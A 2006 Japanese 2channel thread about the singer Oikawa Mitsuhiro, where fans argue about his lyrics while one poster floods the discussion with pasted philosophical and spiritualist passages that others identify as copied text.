871 :NO MUSIC NO NAME:2006/09/17(日) 21:21:22 ID:TucKy1uv
学生時代に学んだのは法哲学じゃなかったっけ?

872 :NO MUSIC NO NAME:2006/09/17(日) 21:23:07 ID:TucKy1uv
>867
あぁ、ごめん。
あなたの

>及川光博のファンであるならばもうすこしまともな人間だと思うのだが・・・・

に対して、及川の名前を出さないでねと言いたかったのだよ。
ベイベであることとは関係ないから、この文脈で名前を出さないでねってこと。

873 :NO MUSIC NO NAME:2006/09/17(日) 21:24:42 ID:/O4ietay
>>868
そうですね
全ての芸術は同じ一つの根から生じる。
しかし、不思議で稀有なことは、同じ幹になる《果実》が実に多種多様なのである。
この差異は、個々の芸術の手段――すなわち表現手段――の違いによって生じる。
一見すると、これは非常に単純なことに見える。
音楽は音で表現し、絵画は色で表現する、等々。そんなことは周知の事実である。
しかし、違いはこれに尽きない。
例えば音楽は、その手段(音響)のために時間を必要とし、絵画はその手段(色彩)のために平面を必要とする。
時間と平面は正確に《測定》されなければならないし、
音響と色彩は正確に《限定》されなければならない――これらの《限定》が《均衡》の基礎、すなわちコンポジションの基礎である。
こうした違いを打ち壊すのが、コンポジションにおいて決定的な力を持つ、幾つもの謎めいた法則である。
なぜなら、こうした諸法則は全ての芸術において普遍的だからである

874 :NO MUSIC NO NAME:2006/09/17(日) 21:25:49 ID:/O4ietay
さらに言うと、時間と空間の《有機的相違》が一般に誇張されすぎているという点を、
私はぜひ強調しておきたい。
作曲家は聴衆の手を取って音楽作品の中へ没入させ、一歩一歩と導いていき、《作品》が終わると解放する。
この誘導は完璧だ。絵画においては不完全である。
しかし! ・・・・・・画家は作曲家と同様にこの誘導法を使うことができる。
画家は、望むなら、観賞者に《ここ》から自分の絵のところまで真直ぐ歩かせ、《そこ》まで来たら解放することができる。
これは極めて複雑な問題であり、まだほとんど世に知られておらず、解決など夢のまた夢という状況である。
私の言いたかったことは、絵画と音楽の親近性は明らかだ、ということだけである。
それどころかこの親近性は、もっと深いところから発するものである

875 :NO MUSIC NO NAME:2006/09/17(日) 21:27:09 ID:/O4ietay
様々な芸術の手段を通して引き起こされる《連想》の問題を知っているよね?
何人かの学者(特に物理学者)と芸術家(特に音楽家)は、
ずいぶん昔から、例えば音楽の響きが特定の色の連想を引き起こすという現象を観察してきた。
言い換えれば、人は色を《聞き》、音を《見る》のである。

876 :NO MUSIC NO NAME:2006/09/17(日) 22:37:23 ID:IkYxSTYz
ぉぃこら。人数が急に増えましたね。
烏合の衆ですか。
まあいいや。
話豚切るけど。
http://www.youtube.com/watch?v=WXEbaHQ0PhI
恋愛の歌ならこんぐらいの勢いで書いて欲しいな及川光博。
ブリリアントだとか昨日書いたけど。
まだまだエクセレントの域を超えない。



877 :NO MUSIC NO NAME:2006/09/17(日) 22:44:16 ID:/O4ietay
そんな簡単にいうなよ、非ベイベ
恋愛とは世界観の崩壊――世界を革命する力以外のなにものでもない。
その自らの世界のカタストロフの快楽――ああ、そはなにものにも
例えようのない歓びの崩壊、愛の愉悦、愛の快楽――究極悦楽!!
この快楽のない愛は、社会と戦わず、何の障害もない愛は、
それはただの社会的日常に過ぎず、愛ではないだろう。

878 :NO MUSIC NO NAME:2006/09/17(日) 22:50:21 ID:IkYxSTYz
このhyper balladは。
詩も良いし曲の展開も良いと思う。
三日月姫なんかは展開に手がかかっていると思う。
だけどロマンティックさが足りない感じ。
この際。
ロマンティクを要求したい及川光博には。
なんか。
よくモラリティーが賞賛される事が多いみたいだけど。
あれは世の中に失望したての子がどうしようどうしようと。
悩んだ挙句こうしましょうみたいな少年的な所があって青い。
ベイベ達。生意気だけど私はこう思った。
昨日古さを感じないと少し述べたが。やはり古い過去のものとしての
曲もあったりする。
今後を生きる及川光博には。
もうなにもかも分っちゃって笑うしかなくてロマンスを求めるみたいな。
そういう感じがいいな。自分でも何やってるか分からないけど。

879 :NO MUSIC NO NAME:2006/09/17(日) 22:54:48 ID:/O4ietay
>>878
美と歴史とロマンスの混合がいかに私の心を捕えたか、言葉では語れないほどである。
せいぜい私に言えるのは、自分の過去を振り返るとき、それが私のこれまで得た最高の喜びであったということぐらい
今、あの喜びを再び持つことのできる人間はいないだろう。
この世から永久に失われてしまったからだ。
当時(モラリティの頃)の私はオックスフォード大学の学部生だった。
オックスフォードは、あのノルマンの街ほどに驚くべき、ロマンティックな、一見して中世的な都市ではなかったが、当時はまだ過去の美しさを多く保っていた。
当時の灰色の街路の思い出は、私の人生に不変の影響と喜びを与えている。
今の姿を忘れることさえできたら、その思い出はもっと素晴らしいものになるのだが。
このことは、いわゆるオックスフォードの学問よりもはるかに重要なことだったのに、実際には誰も私に教えようとはせず、私も学ぼうとしなかった。
それ以来、この教育の豊かな美とロマンスの守護者たちは
「高等教育」(これは彼らの服従している不毛な妥協体制の仇名である)に従事していると偽りながら、
それを完全に無視し、美とロマンスの保存を商業上の必要という圧迫に明け渡して、これを完全に破壊しようと決意しているかに見える。
こうしてまた一つ、世界の喜びが風塵と化していく。
ここでもまた、美とロマンスは、無益に、理由なく、愚かにも投げ捨てられてしまったのである。
及川には投げすてられたくは。。。ない

880 :NO MUSIC NO NAME:2006/09/17(日) 22:56:57 ID:IkYxSTYz
>>877 あんたまだやってたのか。乙だな。ってか何が言いたいんだ?
訳が分らないので完結にな。
とかw 私に言われてるんだからあんた。極度のナンデスカマンですから。
自己で理解しておくように。

ああ。こういうのがあったよ。

サンプリングしたハートと盗んだソウル
運命を占うために占ったら
「愛は不滅でもそれは貴方を一瞬にして破壊する」
優しいママどうか教えて

私も。愛が何かを救うとは思わない。そう願うけど。
ここで言う恋愛って言うのは今言ったロマンスの枠の中。
檻の中で彼女は美しかったというように。
ロマンスの枠に恋愛を閉じ込めておくと。
すごく美しく見えたりそういうこと。

881 :NO MUSIC NO NAME:2006/09/17(日) 22:59:11 ID:IkYxSTYz
>>879 外国の話はさんざん昨日から聞いてもう聞き秋田。
あんた武士道読んだほうが。
収穫は大きいぞ。
武士道か。
及川光博が若くて出来たなら。
御法度にでて欲しかった。音楽の話じゃないが。

882 :NO MUSIC NO NAME:2006/09/17(日) 23:01:34 ID:IkYxSTYz
オックスの外国かぶれが。
上京して田舎帰って。
都会風吹かせているみたいだぞw

面白いけどな。だからかいつまんで言いたい事は何なんだ?
一言に集約せよ。
頭良いんだろ?
良いか?
及川光博について。何が言いたい?

883 :NO MUSIC NO NAME:2006/09/17(日) 23:02:09 ID:TucKy1uv
新しい人がきたw
私はロマンティックよりエロを要求したいね。

884 :NO MUSIC NO NAME:2006/09/17(日) 23:02:11 ID:/O4ietay
>>881
及川と武士道を一緒に考えるとは恐れ入るよ、非ベイベ
武士は生まれながらにして、名誉を自覚し、不名誉を最大の恥と考える。
武士にとって名誉は「名」「面目」「外聞」などという言葉で意識されるのである。名誉と恥は裏表の関係にある。
名誉が尊ばれない世の中では、必然的に恥が横行するのだが、名誉が曖昧になれば、それに応じて恥じも曖昧になるわけで、恥を恥と思わなくなってしまうことになる。
廉恥心は「恥を知る心」である。恥を恥じと思わないことを破廉恥という。

名誉は空気のようなものかもしれない。
しかし、それは、武士にとって"損得勘定"の対象ではないのである。
また、墓石の紋章でもない。生きる武士が追い求めた目標だったのである。
及川にとっての名誉とはなんだ?
CDの売り上げか?それとも観客動員数か?

885 :NO MUSIC NO NAME:2006/09/17(日) 23:07:06 ID:TucKy1uv
爪あと。

886 :NO MUSIC NO NAME:2006/09/17(日) 23:08:33 ID:IkYxSTYz
新しくないぞ。散々な痛いやつだぞ。
私はマイペースで行くぞ。悪しからず。

エロ!
良いねエロ。
若い時のリビドー丸出しの10年前及川光博ではなくて。
さらに磨きが掛かったエロスが聞きたいな。
いいわーそれ4

887 :NO MUSIC NO NAME:2006/09/17(日) 23:10:04 ID:IkYxSTYz
爪あとだと?
なんかエロヌだな。
でも昭和のムード歌謡的な幹事もしなくもないか?w

及川光博にはシャンソン的なエロを求めたいな。

888 :NO MUSIC NO NAME:2006/09/17(日) 23:10:34 ID:/BBU+h+r
>>878
> もうなにもかも分っちゃって笑うしかなくてロマンスを求めるみたいな。
> そういう感じがいいな。自分でも何やってるか分からないけど。

ちょっと…いや全然違うが「メリーゴーラウンド」などの詞の世界はどうだい?
モラリティは青いが、すでにその歌詞世界の時点にいない今もなお歌い続けることに
意味がある気がする。同じ歌でもメッセージの伝え方が違う。

ちなみに御法度なら松田、武田、浅田…どの役で望む?
違う映画ではすでにミチーも沖田は演じたのだが。

889 :NO MUSIC NO NAME:2006/09/17(日) 23:12:25 ID:/O4ietay
エロスは次のようにして生まれました。
美の女神アフロディテ誕生の祝宴の夜、
それに列席していたポロス(策略、豊富)が神酒に酔いつぶれて眠っているところへ、
ペニア(欠乏、困窮)が添い寝して、エロスを身ごもった。

このように、エロスは、美の女神誕生の祝宴のときに生を受けたので、生まれつき美しいものを恋するものなのです
エロスは、ポロスとペニアの子どもですから、
第一に、母ペニアの性を受け継いで、いつも貧しく困窮しており、
他方、父ポロスの性を受け継いで、美しいもの善きものを策略によって狙う者、という定めにあります。
より正確にいえば、エロスは、決して困窮しつくすといことも富みつくすこともなく、
いつも困窮と豊富の中間にあって、美しいもの善いものを求めているということになるでしょう。

ここで重要なのは、「美しいもの」「善いもの」が何かということです。
つまり、それが身体の場面で美しいものという意味である場合には、
エロスは、美男美女を求めて身体的に交わろうとすることを意味し、それは通俗的な意味でのエロスに近くなります。
他方、「美しいもの」が精神の場面での美しいものという意味である場合には、
精神の場面で最も美しいものとは「知」に他なりませんから、
エロスは、「知」を求めることを意味し、したがって、エロスとは、「知を愛し求めること」、すなわち、「フィロソフィア」(哲学)を意味することになります。

890 :NO MUSIC NO NAME:2006/09/17(日) 23:13:00 ID:TucKy1uv
メリーゴーランドは輪廻転生でしょ。
いまさらどうだいって言われても。

891 :NO MUSIC NO NAME:2006/09/17(日) 23:14:21 ID:TucKy1uv
>889
エロスじゃなくて、エロ。
微妙に違うつもりなんだけど、な。

892 :NO MUSIC NO NAME:2006/09/17(日) 23:14:27 ID:IkYxSTYz
マツダに決まってる罠

で。メリーゴーラウンドいいね。なんか初期作品ばかり聴いてて忘れてた。
今ではすっかりエッジの丸くなった及川光博ですが。

あれもあれでいいのかな。リアルタイムなベイベとしては?・・・・?
私にとっては全部途中乗車だから。
今が今にしか聞こえないことがあるたまに。

893 :NO MUSIC NO NAME:2006/09/17(日) 23:15:52 ID:/BBU+h+r
>>890
そうだよ。主題はわかりやすく今までにも各人に語り尽くされてきたテーマ。
それを究極のラブポップに乗せて歌うミチーの世界観はどう?って聞いてみただけ。

894 :NO MUSIC NO NAME:2006/09/17(日) 23:16:27 ID:/O4ietay
>>890
輪廻転生とは何でしょうか。
それは周知のように「カルマ」の概念とセットになっています。
これらの考えの前提として、まず「霊魂」というものが何であるかが明らかにならなければなりません
。転生するというのは、何が転生するのかということです。

仏教の唯識哲学においては、「阿頼耶識」を輪廻の主体として立てています。
もちろん阿頼耶識といっても、宇宙のすべてのものと同様それ自身で独立して存在するものではなく、
縁起的(関係的)存在としてあります。これはおおざっぱに言ってしまえば「魂」というものに該当するとも言えますね

895 :NO MUSIC NO NAME:2006/09/17(日) 23:17:11 ID:IkYxSTYz
私の888取ったな(´・ω・)9
どうでもいいけど。

エロスの身体を語られても困るんだな。
ただ目の前にあるエロを。私たちの中にある生活に密着系の
エロヌの話してるんだから。余計な知識はこの際なっすぃんぐだ。

エロいな

896 :NO MUSIC NO NAME:2006/09/17(日) 23:17:19 ID:78+Q+Slu
突入!
メンヘラタ-ン(つ´∀`)つ 

897 :NO MUSIC NO NAME:2006/09/17(日) 23:17:55 ID:/O4ietay
>>893
現在の「私」という視点から考えてみましょう。
いま、「私」としての自己意識と、それに映じている世界地平があります
これは、現在における特定の分開性によって現れている世界構成です
これは、私の肉体の死をもって終了する世界構成と言えます

この世界構成は、現在のレベルにおいて限定された「私の意識」によって生み出されているわけではありません。
もしそうであるなら、私は自在に意識によって物質を動かし、生み出すことができ、念力や物質化現象を意のままに行うことができるでしょう。
実際には、世界を構成している意識場は、より深層に、無意識レベルに眠っているのです。

898 :NO MUSIC NO NAME:2006/09/17(日) 23:19:10 ID:IkYxSTYz
>>894 おまいは人の揚げ足いちいち取るな。

頭良いのは分ったから。
今度は仏教かい?はいナモナモナモナモな。

メリーゴウラウンド。転生輪廻。あの人死ぬ気だったのか?

899 :NO MUSIC NO NAME:2006/09/17(日) 23:19:47 ID:TucKy1uv
>894
いちいち説明してもらわなくてもいいよ。

>893
素敵だと思う。陳腐な言葉だけど。
あれはライブで聴くと、こちらの心情で印象が変わってくる。
めちゃめちゃ楽しくなるときもあれば、号泣するときもある。
ニコニコ笑いながら涙だらだらみたいな泣き方ね。
みんな幸せになれるといいねー!とかそういうこと思う。

900 :NO MUSIC NO NAME:2006/09/17(日) 23:20:28 ID:/O4ietay
阿頼耶識的意識場という個的な魂の根源は、死後ただちに自覚されるわけではありません。
通常、分開された個的な意識は、アストラル次元において固有の世界領域を生成して居住する状態にあります。
物質領域への展開はあくまで例外的であり、割合としてはアストラル次元に展開していることが多いと言えます。
「霊」において覚醒していない意識は、依然として個的な意識次元において存在しつづけ、
その意識領域を分開の根源にまで拡大することは簡単にはできません。
そこで分開性の根源にある意識場は、あたかも自分とは別の存在であるかのように了解されます。
しかし真実には、それは自分の中に潜在しているとも言えます。
つまり肉体の死後は、肉体的生存時にもっていた
アストラル次元の世界構成作用(それは物質領域での存在時には背後から潜在的に作用していたのでしたが)が全面に出て、
そのような次元における意識主観−世界領域という世界分節の中で自己意識をもつ存在へと移行することになります。
つまりいったん阿頼耶識的意識場から分開された自己意識体は、
通常、アストラル次元と物質次元を往復しつつその個的存在性を維持することになります。
その意識分開の根源へと自覚領域をシフトするためには一種の「死」を体験する必要があります。
これが「死と再生」という元型的構造です。
ある次元の意識場の中に高次次元への自覚が開かれる時には必ずそのような過程を通ります

901 :NO MUSIC NO NAME:2006/09/17(日) 23:22:00 ID:TucKy1uv
>898
違う違う。死ぬつもりなんかじゃないよ。
死んで生まれて未来でもまた出会って・・・よろしくねって、前向きwな歌だよ。

うまくかけないけどさ。

902 :NO MUSIC NO NAME:2006/09/17(日) 23:23:42 ID:IkYxSTYz
>>896さn ぉぃこら。私の事か?まあ。頭はおかしいな。
及川光博なんか聴いてここ居るんだからな。
確かに頭はおかしいから良い。
頭オカシクなってるほうが都合が良いし。
ああ。こういうのってXTCだな。
都合の良い誤解は人を良い気分にさせる。

>>897 おまいは。私の質問に答えよ。
頭良いんだろ?
一言で言え。
及川光博のなにを語りたい?

あ?私?色々だw!!!!


903 :NO MUSIC NO NAME:2006/09/17(日) 23:23:56 ID:/O4ietay
>>901
それは君の勝手な解釈じゃないですか?
ウィルバーなどのトランスパーソナル心理学では、「自我」と「意識魂」を明確に分けていません。
自我とは、近代心理学では、社会的現実構成において機能しえる自己意識を指します。
これは霊的発達において不可欠なものではありません。
それをバイパスする知能障害者という道もまたその魂なりの霊的成長の道であるのです。
意識魂とはシュタイナーの用語ですが、これは「自分とは他とはかえがえのない自分であるという明晰な意識」を意味します。
これは、究極的には「私とは私である」という宇宙叡智体の意識を分有していることを自覚し(とまではいかなくても予感し)
宇宙において自分が一つの存在としてここにあるという「存在の感覚」と関連するものです。
これは意識的な霊的成長にとってきわめて重要なものです。
しかしこれを、社会的自我の発達と区別しえないのが、近代の心理学の限界です。
この意味での自我は、自己が生成している世界領域を客体視してそれに執着する傾向を有し、
その傾向が死後にも存続する場合もあります。これはいろいろ問題を引き起こします。
これに対し意識魂とは、自己の根源が宇宙的な過程にあることを予感するものです。
近代の心理学者は、本当は「意識魂を発達させよう」と言うべきところを「自我を確立しよう」と言ってしまったのだということですネ


904 :NO MUSIC NO NAME:2006/09/17(日) 23:24:47 ID:/O4ietay
>>902
あ?私?色々だw!!!!

905 :NO MUSIC NO NAME:2006/09/17(日) 23:25:01 ID:TucKy1uv
>903
私は荒らしなんでしょ?スルーしてくださいな。
あなたの難しい言葉は、低俗な私にはわかりません。

906 :NO MUSIC NO NAME:2006/09/17(日) 23:25:11 ID:IkYxSTYz
>>901さn
あの前向きさが。
私には死ぬ一歩前の夢みたいに思えたんだ。
私も上手くかけないけど。このオックスみたいにはねw

907 :NO MUSIC NO NAME:2006/09/17(日) 23:26:39 ID:TucKy1uv
>903
それに、私は輪廻転生を説明したいんじゃないのよ。

908 :NO MUSIC NO NAME:2006/09/17(日) 23:27:43 ID:IkYxSTYz
私にもサパーリよw >>905
読んでるけど笑えるし。面白い人だなあ。

あ。また人の言葉を鸚鵡する人がいる。
オウムが聞いたら怒るぞ。黒い九官鳥だなあんた>>904


909 :NO MUSIC NO NAME:2006/09/17(日) 23:29:55 ID:IkYxSTYz
>>907さn
だ・な!そういちいちうんちくがあるとさぞかし邪魔だろうな。
及川光博には行動が伴なってある時は行動のほうが早いかも
知れないから。
小ざかしいうんちくなしで聞けるところも尚結構だよね?

910 :NO MUSIC NO NAME:2006/09/17(日) 23:30:08 ID:/O4ietay
>>908
決して単なる「こだま」でも「鸚鵡がへし」でもない。
かつて私のものであつたそれらの言葉は、その本意を保ちながら、
いまや完全に自身のものとなつて、その構想のうちにぴたりと位置づけられ、使ひこなされている。
それが何よりも嬉しいのよ

911 :NO MUSIC NO NAME:2006/09/17(日) 23:31:33 ID:TucKy1uv
>906
具体的にどの曲とは言えないけど、死の匂いがしたのは、初期のほうが断然強い気がする。
で、ココロノヤミあたりで抜けたかな?という印象はある。あくまでも個人的な意見だけど。
最近の曲は、死んでまた生まれ変わってというイメージがあっても、
そこには生を意識した死があるというか死を否定的に捉えてないというか、
生の延長線上の死というか・・・うまくかけないな。
まあ、愛は永遠なりという、言葉にするとあまりにもくさい感じなんだけど。

でも、私はエロを求めたいw

912 :NO MUSIC NO NAME:2006/09/17(日) 23:34:12 ID:/O4ietay
>>911
及川の思想の要諦の一つが相互主体性(間主観性)にあることはこれまで書いてきたけど
ヘーゲルとの関連で相互承認論の文脈ばかりが強調されたきらいがあり、
及川の独自性、思想の豊かさがまだ充分に伝えられてはいないのではないかと思う。
彼の相互承認論、相互主体性の問題が社会哲学的意義をもつことは当然ではあるが、
しかし、フィヒテの相互主体性の議論において、反省的判断力や想像力、
あるいは目的論的なアナロジーが駆使される点に注目すると、そこには社会哲学だけには収まらない意義もあるんじゃない?

913 :NO MUSIC NO NAME:2006/09/17(日) 23:36:36 ID:TucKy1uv
>912
ごめん、わからない。

具体的な曲名を示して、こう感じるんだと言ってくれれば、
少しはわかるかもしれないけど、たぶん、あなたと同じ「言語」では語れない。

914 :NO MUSIC NO NAME:2006/09/17(日) 23:36:59 ID:IkYxSTYz
>>910 その程度なら分る気がするぞ。
がへしってあんた何時代の方デスカあうあうあー
でも今の>>910の言葉以外あんたの言葉としては受け取れないけどね。
まあ。あんたがそうおもうならそれで良いんだろうけど。
こっちひっぱってきてクッツケテコレー出来ましたとか言って。
人の言葉尻捕まえてナニナニとかまるである日のモルモン教徒だな。

こじつけだとかいうと。
私もだけど。
私は言いたいことが言葉に出来ない場合だけ例えとか
あるいはものを拝借する事はあるがてかいつもそうかも知れないが。
あんたとは違う。
私は「感覚」を伝いたいだけ。人に説教してるんぢゃないよ。

及川光博で説教されてみろ。
あのはぐらかしやろうのことだ。
からかっているようにしか思えないですからあ!

915 :NO MUSIC NO NAME:2006/09/17(日) 23:38:32 ID:/BBU+h+r
ID:TucKy1uvもID:IkYxSTYzも
ID:/O4ietayにまともに返事しても無駄だよ。

書いているのはすべてどこかからのコピーペースト。
たとえば>>910は「長谷川三千子」という人の文章からパクって来たもの。
他もしかり。
時間の無駄。まともにレスすればするほど喜ぶ。遊ばれてんだよ。

916 :NO MUSIC NO NAME:2006/09/17(日) 23:39:02 ID:/O4ietay
>>913
モラリティを例にすると
よく知られているように自己意識の成立の際、自我である主体が自分の自由な活動性を損なわない形で、しかも同時に非我である客体から規定されるという矛盾がある。
これは「主体が自己を限定するようにして限定されること」すなわち、客体からの被限定が同時に自己限定でもあるような活動によって解決された。
それが「促し」の概念
この客体からの「促し」は自我に自由な自己限定を促すものだから、意味をもった「概念」であり、自己規定という一定の「目的」であった。
そのとき、自我は客体に対して、この存在が促しという一定の目的を自分に与える以上は、
当然その目的・概念・意味を理解する理性的存在者でなくてはならないだろうと「推論」する。
つまり、この他者は促しという「目的」によって制約されている。
あるいは、自我の側からすると、促しから、反省的判断力によって、
この他者を「目的」にかなうものとし、そこから及川は理性的存在者であろうと類推するんだけど

917 :NO MUSIC NO NAME:2006/09/17(日) 23:39:29 ID:IkYxSTYz
>>911さn
そそ。そうかー。こうして年代順に並べてみると確かにそう
思えるスジがある。
及川光博に何かあったのか?

エロいいよいいよーw
及川光博年齢も年齢だから。
ねっとりとしたなんかこびりつくようなエロを求めたい。
グルーなエロな。

918 :NO MUSIC NO NAME:2006/09/17(日) 23:41:21 ID:TucKy1uv
>915
レスに時間かかってるのは、検索して引っ張ってきてるのか?
それはそれで凄い才能だね。
鸚鵡返し、という言葉でぐぐったのかな。

919 :NO MUSIC NO NAME:2006/09/17(日) 23:41:26 ID:IkYxSTYz
>>915さn
詳細レポ乙まりが。
了解したが。
この人面白いぞ。よく読んでみろ。読んでないけどw
引き出しは色々あるみたいだけど。
片付けられない女みたいだ。

920 :NO MUSIC NO NAME:2006/09/17(日) 23:42:31 ID:/O4ietay
>>915
人間には客観的な本質ってものがないんだから、「どうやるべきだ」というような決まりもない

921 :NO MUSIC NO NAME:2006/09/17(日) 23:43:38 ID:IkYxSTYz
ググ厨かw
必死でググってんのな?これはこうとあれはあれとか。
頭良いなあ。
及川光博面白いベイベ抱えてるな。
手紙に書いたりな?おもしろそー。

922 :NO MUSIC NO NAME:2006/09/17(日) 23:44:10 ID:/O4ietay
>>918
真の生活においては、美の知覚と創造、真の喜びの享受が、日々のパンと同じぐらい必要なものだと感じられる。
そして誰一人からも、いかなる集団からも、反対のための反対による場合を除けば、この喜びを奪うことは許されない
たとえオマエにもね

923 :NO MUSIC NO NAME:2006/09/17(日) 23:45:07 ID:TucKy1uv
>917
何があったのかは、さすがにわからないなあww
ただ、「これでいいんだ」と思える何かがあったんだろうなあとは思う。
大切にしたい女でも出来たか?とも思ったがw

ちゃんとエロを表現できる人だと思うんだよねー。
若さのカタルシスのライブパフォーマンスなんか凄く良かったんだけど、
最近は愛のほうに重心が移ってるような気がするから、遠のいてるね。

924 :NO MUSIC NO NAME:2006/09/17(日) 23:45:34 ID:IkYxSTYz
>>920 確かに人生にも2ちゃんにも決まりはないが。
あんた素直になれよ。
ぼーくーの悲しみロ(ry

少なくても>>920は分った言葉ー

925 :NO MUSIC NO NAME:2006/09/17(日) 23:46:08 ID:TucKy1uv
だんだんアンカーがおかしくなってきたね。>922

926 :NO MUSIC NO NAME:2006/09/17(日) 23:46:55 ID:IkYxSTYz
>>923さn
      うぬ。
及川光博になら。
及川光博になら出来るやってくれるやり遂げてくれる。
と夢を託したい。

927 :NO MUSIC NO NAME:2006/09/17(日) 23:48:42 ID:IkYxSTYz
>>922 
パンでなく現実的にご飯食え。そして寝ろ。
もうこうさ。
ガッと現実的に話汁

928 :NO MUSIC NO NAME:2006/09/17(日) 23:49:53 ID:TucKy1uv
>926
あの容姿と品の良さがあるから、エロを表現しても、下品にならないのがいいんだよね。
ま、そこが腐女子ポイントなのかもしれんが。

929 :NO MUSIC NO NAME:2006/09/17(日) 23:52:27 ID:/O4ietay
とうとう論破できずに個人批判か。
せつないぞ非ベイベ共
及川の作品は胸に突き刺さる。
それはやはり、及川が「弱者」だからだと思う。
知性を備えた弱者=社会的評価を受けにくい→それでも書く、書かざるを得ない→
並みの人間のあざとさでは永遠に追いつけない、狂気と諦念の凄絶さ、静謐さがある。
そんな及川が好きだという理由で個人批判されるのはいかがなもんかと思うが?

930 :NO MUSIC NO NAME:2006/09/17(日) 23:54:25 ID:TucKy1uv
よく言うよ。
人のこと低俗だのなんだの荒らし認定したくせに、
自分が相手にされないといきなり及川の名前を出して気を引いて。
そういう文脈で名前を出さないで、と言ったでしょうが。

931 :NO MUSIC NO NAME:2006/09/17(日) 23:55:47 ID:/O4ietay
及川の詞を読んでいると
読み終わった後暗いというかなんとも言えない気持ちになる。
若さゆえに書いたのは本当にすごいし、心理状況が変化していく様の
描写は度肝を抜かれるものがあるけど、年若いうちから苦労して詩を生み出して、怖気づいて、
あげくに世間からは認められず
恥ずかしいなんて自己中なこと思い、結局は色物としてデビュー
気持ちは伝わってくるんだが、感情移入できなくてどこか冷めてしまう瞬間がある

932 :NO MUSIC NO NAME:2006/09/17(日) 23:56:03 ID:TucKy1uv
>929
>知性を備えた弱者=社会的評価を受けにくい→それでも書く、書かざるを得ない→
>並みの人間のあざとさでは永遠に追いつけない、狂気と諦念の凄絶さ、静謐さがある。

それはなにもミチーに限ったことではないんじゃないの?
アーティストと呼ばれる人の多くは、そういう境遇にいると思うけど。

933 :NO MUSIC NO NAME:2006/09/17(日) 23:57:20 ID:/BBU+h+r
>>916はフィヒテについての考察
>>922はウイリアム・モリスから
持ってきてる。

ちょっとぐぐればすぐに出てくるな。

こいつは単なる荒らしであって主義主張も滅茶苦茶。
引き出しもなにも…一切考えずにコピペしてるとしか思えない。


しかし ID:TucKy1uvもID:IkYxSTYzももあまりやりすぎるなよ。
たくさんのファンがこの状態を見て沈黙していることも頭の隅に。

もちろん>>929もコピペだ。

934 :NO MUSIC NO NAME:2006/09/17(日) 23:57:49 ID:TucKy1uv
>931
恥ずかしさを読み取った歌詞はどれ?
私はそれはないな。

935 :NO MUSIC NO NAME:2006/09/17(日) 23:58:48 ID:TucKy1uv
>933
ごめん。もうしない。そいじゃ。

936 :NO MUSIC NO NAME:2006/09/17(日) 23:59:30 ID:/O4ietay
>>934
低俗に低俗といったまでだが?
消え去って行く無名の記憶たちを描く事よりも、そこに浮かび上がってくる衝動が主眼だという気がする。
その衝動の原因は一見過去に隠されてしまっているように見えるが、実はそもそもそのような精神構造を作り上げたものは名指しできるような
ものではなく、一つの要素として移民によるトラウマという説明で統一されているが、その原因の複数性に読者を引きずり込む手段として、
虚実のあわいをたゆたうという手法を取っている、というように思うよ

937 :NO MUSIC NO NAME:2006/09/18(月) 00:01:44 ID:V5J0SBBW
>>933
ちょっとググったにしてはえらく時間かかってるなw
本人乙、精神分離症なのはわかったから市ね

938 :NO MUSIC NO NAME:2006/09/18(月) 00:03:21 ID:AHEDSIi5
手本とする理論や哲学があってこそ己の考えをもてるんだと思うが?
非ベイベ諸君はいままで全て独学で生きてきたのか?

939 :NO MUSIC NO NAME:2006/09/18(月) 00:04:25 ID:AHEDSIi5
IDが変わったな。私はID:/O4ietayだ言わずもがなだが

940 :NO MUSIC NO NAME:2006/09/18(月) 00:08:05 ID:rOxIYX08
社会構造的な史的唯物論か
今現在においてブルジョアはほとんど存在しない。
階級闘争としてのまたは権力としての上部構造下部構造だな
ひっくるめれば社会的ヒエラルキーの問題だな。
私の立場だとゲーテ主義(対象的思惟)で知覚と思考の一元論で
一見対立しているが統一することが可能な立場ですね
私から見れば資本主義批判、第二唯物論、あなたはレーニンにだまされたのではなく
スターリンにだまされた。レーニンの最後の言葉「あの男には気おつけろ」
スターリニズム一色に染まったわけだ。それはその後が示している。
政治的に反するものを大量虐殺などだな
マルクス側からすれば行き着く先が崩壊させられているね。
様々な哲学的立場を取り入れ生き残ってきた。社会科学が成立するまでに
そういうところですね。

941 :NO MUSIC NO NAME:2006/09/18(月) 00:09:12 ID:d/HSWrw6
>>940が、どれだけ核心を突いているか・・・w
このスレに解ってる人間はいるのか?

この肉体のないところに、
意識、精神、心、がありえるのか否か?

942 :NO MUSIC NO NAME:2006/09/18(月) 00:10:18 ID:7NAISKxx
同意だね。だから、第二唯物論は、精神が何かの説明が広義の意味での
ぶしつ活動だからね。何の証明にもなっていないし、精神が何かも何も言っていない。

943 :NO MUSIC NO NAME:2006/09/18(月) 00:12:25 ID:/JNlLIzs
おかしな非ベイベ共ですね
>>934>>927の荒らしが始まったのでしょうか?
それとも新たな輩の登場なのでしょうか?

944 :NO MUSIC NO NAME:2006/09/18(月) 00:19:10 ID:fx7uRXSA
メンヘラターン〜(つ´∀`)つ

945 :NO MUSIC NO NAME:2006/09/18(月) 00:30:55 ID:kcS7ZLk4
Die ersten drei dieser vier Begriffe sind in den letzten funfundzwanzig Jahren ausgiebig verwendet worden, wahrend von dem vierten Begriff,
Gedanke, nicht soviel Aufhebens gemacht worden ist.
Leider liefern die Methoden im Musikunterricht, anstatt die Schuler grundlich mit der Musik selbst vertraut zu machen,
ein Konglomerat mehr oder weniger wahrer historischer Fakten, versust mit einer grosen Anzahl mehr oder weniger falscher Anekdoten uber den Komponisten,
seine Ausfuhrenden, sein Publikum und seine Kritiker,
plus eine starke Dosis popularisierter Asthetik. So las ich einmal in einer Prufungsarbeit einer Studentin im zweiten Studienjahr,
die nur wenig Harmonielehre und viel ≫Musikverstandnis≪ [als Fach] studiert, aber gewis nicht viel tonende Musik gehort hatte,
das ≫Schumanns Instrumentation trube und unklar≪ sei. Diese Weisheit stammte wortlich genau aus dem Lehrbuch, das in der Klasse benutzt wurde.
Manche Fachleute fur Instrumentation wurden vielleicht sogar ohne Argument der Verdammung Schumanns als Instrumentator zustimmen.
Indessen konnte es andere Fachleute geben, die sich daruber einig waren,
das nicht die ganze Instrumentation von Schumann schlecht sei - das es trube ebenso wie glanzende oder zumindest gute Stellen gebe; sie wusten auch,
das dieser Vorwurf von dem Streit zwischen der Wagnerischen
≫Neudeutschen≪ Schule und der Schumann-Brahmsischen akademisch-klassizistischen Schule herruhrt und das die Kritiker so glanzende
Stellen aus Wagners Musik im Sinn hatten, wie den Feuerzauber, das Meistersinger- Vorspiel, die Venusberg- Musik und andere.
